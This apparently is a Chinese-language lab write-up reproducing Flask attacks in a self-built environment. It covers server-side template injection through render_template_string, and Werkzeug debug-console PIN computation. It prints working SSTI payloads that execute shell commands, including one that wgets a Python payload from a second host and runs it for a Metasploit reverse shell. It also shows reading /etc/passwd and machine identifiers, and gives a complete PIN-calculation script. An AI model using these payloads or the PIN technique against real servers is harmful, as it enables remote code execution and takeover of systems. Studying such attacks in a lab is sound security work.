最近了解到关于flask框架的两种利用方式,于是自己搭环境做一下复现。
模板注入
简单的漏洞代码;
@app.route('/evil')
#----------------------------------------------------------------------
def evil():
code=request.args.get('evil')
html='''%s
'''%(code)
return render_template_string(html)
这里使用 render_template_string()动态的渲染模板,代码中的code是可控的,会和html拼接后直接带入渲染,存在ssti漏洞。
可以轻易的构造xss:
image.png
命令执行
使用类似python沙箱逃逸的方法。:
http://192.168.200.244:8000/evil?evil={{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls").read()' )}}
image.png
可以结合metasploit反弹:
一:生成python马:
image.png
二:ssti下载马并执行:
http://192.168.200.244:8000/evil?evil={{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("wget http://192.168.8.110:5000/a.py -O b.py;python b.py").read()' )}}
image.png
image.png
pin码执行命令
使用条件,server开启了debug模式,存在任意文件读取漏洞。
开启了debug的flask项目在启动时会生成一个debug用的pin码,可以执行python指令。
image.png
而这个pin码在知晓一些条件后,是可以计算出来的。
参考: https://xz.aliyun.com/t/2553#toc-2
还是使用之前的漏洞代码,传入错误的Python代码,轻易触发debug。
image.png
这里我们把之前的ssti当任意文件读取来用:
获取用户名(/etc/passwd):
image.png
通过报错获取文件路径:
image.png
接着获取mac地址(/sys/class/net/ens32/address我的目标服务器是ens32,一般是eth0):
image.png
然后获取/etc/machine-id:
image.png
之后就可以通过脚本计算了:
from itertools import chain
probably_public_bits = [
'root',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/lib64/python2.7/site-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]
private_bits = [
'345051575547'# str(uuid.getnode()), /sys/class/net/eth0/address
'613cacd3857f425e9409e544dece08da', # get_machine_id(),/etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
计算出Pin码:
image.png
可以看到计算出来的pin码和之前debug显示的是一致的。
接下来就可以利用执行命令了:
image.png